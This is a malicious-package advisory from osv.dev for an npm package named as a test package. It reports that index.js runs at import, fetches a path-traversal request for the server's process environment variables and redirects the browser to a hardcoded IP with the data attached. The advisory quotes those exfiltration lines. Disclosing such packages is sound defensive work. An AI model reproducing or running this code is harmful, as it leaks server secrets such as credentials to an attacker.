@a91082900/test_package @0.0.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-3680
Ecosystem
npm
Summary
The package's main file (index.js) executes at module load; it has no exports and no user-invoked API. On import it issues fetch('/api/notes?id=/self/proc/environ') and then assigns top.location = 'http://128.199.217.232/?notes=' + encodeURIComponent(data), relaying whatever the vulnerable endpoint returns (a path-traversal-shaped request for the server process's environment variables) to a hardcoded bare IPv4 address over plain HTTP. Package metadata is placeholder ('no description', generic author handle) and there is no library functionality: this is a PoC/exfil payload packaged as an npm module. Any installer bundling this into a web application would redirect victim browsers to the attacker IP with the exfiltrated data in the query string. Import-time execution, a hardcoded bare-IP C2, plaintext HTTP, and a request path specifically crafted to read /proc/self/environ together leave no benign interpretation.
Source: amazon-inspector (b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254)